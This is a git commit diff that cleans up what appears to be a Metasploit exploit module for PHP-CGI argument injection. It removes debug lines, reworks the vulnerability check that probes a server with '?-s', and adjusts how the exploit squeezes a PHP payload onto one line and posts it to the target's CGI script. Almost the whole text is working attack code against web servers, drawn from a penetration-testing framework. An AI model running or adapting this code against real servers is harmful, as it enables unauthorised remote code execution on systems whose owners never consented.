Fix up the PHP CGI exploit, remove debug lines

2012-05-04 09:58:10 -05:00 · 2012-05-04 09:58:10 -05:00 · 6cf6a9548d
parent d5d35551ab
commit 6cf6a9548d
1 changed files with 19 additions and 22 deletions
--- a/modules/exploits/unix/webapp/php_cgi_arg_injection.rb
+++ b/modules/exploits/unix/webapp/php_cgi_arg_injection.rb
@ -9,7 +9,6 @@
 #   http://metasploit.com/
 ##

-load 'lib/msf/core/exploit/http/server.rb'
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
@ -52,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DefaultTarget' => 0))

 		register_options([
-			OptString.new('TARGETURI', [false, "The URI to request"]),
+			OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]),
 			], self.class)
 	end

@ -61,32 +60,31 @@ class Metasploit3 < Msf::Exploit::Remote
 	#   -s               Display colour syntax highlighted source.
 	def check
 		uri = target_uri.path
-		if(uri and ! uri.empty?)
-			uri.gsub!(/\?.*/, "")
+		unless (uri and ! uri.empty?)
+			uri = "/"
+		end
+		
+		uri.gsub!(/\?.*/, "")

-			print_status("Checking uri #{uri}")
+		print_status("Checking uri #{uri}")

-			response = send_request_raw({ 'uri' => uri })
+		response = send_request_raw({ 'uri' => uri })

-			if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
-				print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
-				return Exploit::CheckCode::Unknown
-			end
-
-			response = send_request_raw({ 'uri' => uri + '?-s'})
-			if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
-				return Exploit::CheckCode::Vulnerable
-			end
-
-			print_error("Server responded indicating it was not vulnerable")
-			return Exploit::CheckCode::Safe
-		else
+		if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
+			print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
 			return Exploit::CheckCode::Unknown
 		end
+
+		response = send_request_raw({ 'uri' => uri + '?-s'})
+		if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
+			return Exploit::CheckCode::Vulnerable
+		end
+
+		print_error("Server responded indicating it was not vulnerable")
+		return Exploit::CheckCode::Safe
 	end

 	def exploit
-		#sleep 100
 		begin
 			php_trues  = [ "1", "on", "true" ]
 			php_falses = [ "0", "off", "false" ]
@ -97,7 +95,6 @@ class Metasploit3 < Msf::Exploit::Remote

 			qs = args.join("+")
 			uri = "#{target_uri}?#{qs}"
-			p uri

 			# Has to be all on one line, so gsub out the comments and the newlines
 			payload_oneline = "<?php " +payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
@ -106,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				'global' => true,
 				'uri'    => uri,
 				'data'   => payload_oneline,
-			}, 0.1)
+			}, 0.5)
 			handler

 		rescue ::Interrupt